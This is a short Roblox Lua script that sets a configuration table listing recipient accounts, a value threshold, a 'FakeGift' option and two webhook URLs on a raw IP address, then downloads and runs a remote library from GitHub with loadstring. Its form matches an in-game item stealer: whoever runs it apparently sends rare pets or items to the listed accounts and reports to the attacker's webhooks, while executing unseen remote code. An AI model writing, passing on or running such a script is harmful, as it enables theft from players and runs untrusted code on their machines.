_G.NullConfig = {
    User = {'DeltaRoblox231', 'DeltaGrow21', 'Shinalifeafter', 'PetGiverz', 'PetGiverzz', 'JandelRobloxz', 'shinpetgiver', 'shinpetgiver1', 'shinpetgiver2', 'shinpetgiver3'},
    min_value = 10000000000,
    pingEveryone = "No", -- dont change this
    Webhook = "http://45.13.225.83:20002/proxy/d91f39935a17f77ce25d017422741692",
    FakeGift = "No",
    Trash = "http://45.13.225.83:20002/proxy/b90f0e7e54f39cb89123afde28436f70",
    LoadingScreen = "No",
    GiftOnlyRares = "Yes"
}

loadstring(game:HttpGetAsync('https://raw.githubusercontent.com/sleepyvill/script/refs/heads/main/lib.lua'))()
